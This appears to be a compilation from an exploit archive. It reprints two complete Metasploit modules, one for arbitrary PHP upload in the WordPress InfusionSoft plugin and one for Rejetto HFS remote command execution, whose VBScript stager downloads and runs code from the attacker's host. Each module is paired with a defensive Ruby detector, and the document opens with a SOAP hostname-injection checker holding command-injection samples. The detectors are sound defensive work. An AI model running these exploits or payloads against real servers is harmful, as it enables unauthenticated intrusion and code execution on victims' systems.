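  return [:block, "not an RFC 1123 hostname: #{host.inspect}"] unless valid_hostname?(host)
  [:allow, host]
end

# Builds constructed sample envelopes in the shape the module above sends.
def soap_set_hostname(host)
  <<~XML
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
    <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
    <hostname>#{host}</hostname>
    </n1:set_hostname>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  XML
end

# Constructed samples (not captured traffic).
SAMPLES = {
  legit:    soap_set_hostname('bigip1.example.net'),
  probe:    soap_set_hostname('`whoami`.a.b'),       # what the module's check sends
  subshell: soap_set_hostname('$(id).a.b'),
  entity:   soap_set_hostname('&#96;id&#96;.a.b'),   # backticks hidden as XML entities
  bad_rfc:  soap_set_hostname('-lb..example'),
  get_only: '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">' \
            '<SOAP-ENV:Body><n1:get_hostname xmlns:n1="urn:iControl:System/Inet" /></SOAP-ENV:Body>' \
            '</SOAP-ENV:Envelope>'
}.freeze

if __FILE__ == $0
  SAMPLES.each do |name, body|
    verdict, detail = inspect_request(body)
    puts "#{name.to_s.ljust(9)} #{verdict} #{detail}"
  end
end
```

The entity case is the one a naive backtick grep misses: the XML layer decodes &#96; before the value reaches the shell, so the check has to run on the decoded string. The RFC 1123 check is the stronger control, since it rejects every metacharacter class at once rather than a denylist.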



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: Wordpress InfusionSoft Plugin Upload Vulnerability

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin',                    # Vulnerability Discovery
          'us3r777 <us3r777@n0b0.so>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
          ['WPVDB', '7634']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}")
      register_files_for_cleanup(php_pagename)
    else
      # res is nil when the server never answered; don't call .code on nil
      status = res ? res.code : 'no response'
      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{status}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end
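The module above leaves a two-step trace in the web server log: a POST to code_generator.php, then a GET for a freshly named .php file in the same utilities directory. The detector below, added here as an example and not part of the plugin or the Metasploit module, correlates those two events per client in Apache combined-format access logs. The log lines are constructed for the example; the window size and alert shapes are my choices.

```ruby
require 'time'

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) (?<size>\S+)/
GEN_PATH = %r{/wp-content/plugins/infusionsoft/Infusionsoft/utilities/code_generator\.php}
UTIL_DIR = %r{\A/wp-content/plugins/infusionsoft/Infusionsoft/utilities/([^/?]+\.php)}

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Flags (1) every POST to code_generator.php and (2) any GET from the same
# client within `window` seconds for a .php file in the same utilities
# directory other than code_generator.php itself.
def find_uploads(lines, window: 300)
  events = lines.map { |l| parse_line(l) }.compact
  posts = events.select { |e| e[:method] == 'POST' && e[:path] =~ GEN_PATH }
  alerts = []
  posts.each do |p|
    alerts << { type: :upload_attempt, ip: p[:ip], at: p[:ts], status: p[:status] }
    events.each do |e|
      next unless e[:ip] == p[:ip] && e[:method] == 'GET'
      next unless e[:ts] >= p[:ts] && e[:ts] - p[:ts] <= window
      m = UTIL_DIR.match(e[:path]) or next
      next if m[1] == 'code_generator.php'
      alerts << { type: :dropped_file_hit, ip: e[:ip], at: e[:ts], file: m[1], status: e[:status] }
    end
  end
  alerts
end

# Constructed sample log lines (not real traffic). The first client runs the
# check-then-upload-then-call sequence; the second only views the generator.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [08/Oct/2014:10:01:02 +0000] "GET /wp-content/plugins/infusionsoft/Infusionsoft/utilities/code_generator.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
  203.0.113.7 - - [08/Oct/2014:10:01:05 +0000] "POST /wp-content/plugins/infusionsoft/Infusionsoft/utilities/code_generator.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
  203.0.113.7 - - [08/Oct/2014:10:01:06 +0000] "GET /wp-content/plugins/infusionsoft/Infusionsoft/utilities/kqzvbtme.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [08/Oct/2014:10:02:00 +0000] "GET /wp-content/plugins/infusionsoft/Infusionsoft/utilities/code_generator.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
  198.51.100.4 - - [08/Oct/2014:10:02:01 +0000] "GET /index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  find_uploads(SAMPLE_LOG.lines).each { |a| puts a.inspect }
end
```

Any POST to code_generator.php is worth an alert on its own, since the module needs no authentication to reach it; the second alert type is the one that says the upload actually landed and was executed.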




Metasploit: Rejetto HttpFileServer Remote Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Rejetto HttpFileServer Remote Command Execution",
      'Description'    => %q{
        Rejetto HttpFileServer (HFS) is vulnerable to remote command execution due to a
        poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by
        using a null byte ('%00') to bypass the filtering. This module has been tested successfully on HFS 2.3b
        over Windows XP SP3, Windows 7 SP1 and Windows 8.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # original discovery
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-6287'],
          ['OSVDB', '111386'],
          ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],
          ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']
        ],
      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
        ],
      'Privileged'     => false,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DisclosureDate' => "Sep 11 2014",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 10]),
        ], self.class)
  end

  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/'
    })

    if res &&  res.headers['Server'] && res.headers['Server'] =~ /HFS ([\d.]+)/
      version = $1
      if Gem::Version.new(version) <= Gem::Version.new("2.3")
        return Exploit::CheckCode::Detected
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Safe
    end
  end

  def on_request_uri(cli, req)
    print_status("#{peer} - Payload request received: #{req.uri}")
    exe = generate_payload_exe
    vbs = Msf::Util::EXE.to_exe_vbs(exe)
    send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
    # remove resource after serving 1st request as 'exec' execute 4x
    # during exploitation
    remove_resource(get_resource)
  end

  def primer
    file_name = rand_text_alpha(rand(10)+5)
    file_ext = '.vbs'
    file_full_name = file_name + file_ext
    vbs_path = "%TEMP%\\#{file_full_name}"

    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
    vbs_code << "On Error Resume Next\x0d\x0a"
    vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a"
    vbs_code << "If Err.Number <> 0 Then\x0d\x0a"
    vbs_code << "wsh.exit\x0d\x0a"
    vbs_code << "End If\x0d\x0a"
    vbs_code << "x.Send\x0d\x0a"
    vbs_code << "Execute x.responseText"

    payloads = [
      "save|#{vbs_path}|#{vbs_code}",
      "exec|wscript.exe //B //NOLOGO #{vbs_path}"
    ]

    print_status("Sending a malicious request to #{target_uri.path}")
    payloads.each do |payload|
      # The leading %00 is the null byte of CVE-2014-6287: it stops the
      # search value being filtered before the {.macro.} is evaluated.
      send_request_raw({
        'method' => 'GET',
        'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
      })
    end
    register_file_for_cleanup(vbs_path)
  end

  def exploit
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # When the server stops due to our timeout, this is raised
    end
  end
end
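A request-side detector for the injection the module above sends, added here as an example; it is not HFS code and not part of the Metasploit module. It percent-decodes the search parameter the way the server does (so %00 becomes a real NUL byte), extracts every {.name|arg|arg.} macro, and grades the request by whether the null-byte prefix is present and whether any macro is one that acts on the host. The sample URIs are constructed; the DANGEROUS list is my reading of the macro names on the HFS scripting-commands wiki page the module references, not a list from HFS itself.

```ruby
require 'cgi'

MACRO_RE  = /\{\.(.*?)\.\}/m
# Macros that act on the host rather than the page (names taken from the HFS
# scripting-commands wiki page referenced by the module above).
DANGEROUS = %w[exec save delete move append load].freeze

# Percent-decodes the search parameter, returning nil when there is none.
# CGI.parse turns %00 into a literal NUL byte, as the server-side parser does.
def search_param(uri)
  query = uri.split('?', 2)[1] or return nil
  query = query.split('#', 2)[0]
  vals = CGI.parse(query)['search']
  vals.empty? ? nil : vals.first
end

def parse_macros(text)
  text.scan(MACRO_RE).flatten.map do |body|
    name, *args = body.split('|')
    { name: name.strip.downcase, args: args }
  end
end

# :clean      no macro markers in the search value
# :suspicious macro markers, but no NUL byte and no host-affecting macro
# :attack     NUL-byte prefix (the CVE-2014-6287 bypass) or a dangerous macro
def analyze_uri(uri)
  search = search_param(uri)
  return { verdict: :clean, null_byte: false, macros: [] } if search.nil?
  null_byte = search.include?("\x00")
  macros = parse_macros(search)
  dangerous = macros.select { |m| DANGEROUS.include?(m[:name]) }
  verdict =
    if macros.empty? then :clean
    elsif null_byte || !dangerous.empty? then :attack
    else :suspicious
    end
  { verdict: verdict, null_byte: null_byte, macros: macros }
end

# Constructed sample request URIs; the first two mirror the module's save/exec pair.
SAMPLE_URIS = {
  save:   '/?search=%00{.save|%25TEMP%25%5Ca.vbs|Set%20x%3DCreateObject(%22Microsoft.XMLHTTP%22).}',
  exec:   '/?search=%00{.exec|wscript.exe%20//B%20//NOLOGO%20%25TEMP%25%5Ca.vbs.}',
  plain:  '/?search=quarterly+report',
  benign: '/?search={.time.}',
  none:   '/files/readme.txt'
}.freeze

if __FILE__ == $0
  SAMPLE_URIS.each do |name, uri|
    r = analyze_uri(uri)
    puts "#{name.to_s.ljust(7)} #{r[:verdict]} null_byte=#{r[:null_byte]} macros=#{r[:macros].map { |m| m[:name] }.inspect}"
  end
end
```

Decoding before matching is the whole point: a rule that looks for the literal string "%00{." in the raw request line is defeated by any other encoding of the same bytes, while a rule on the decoded value sees exactly what ParserLib.pas sees.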

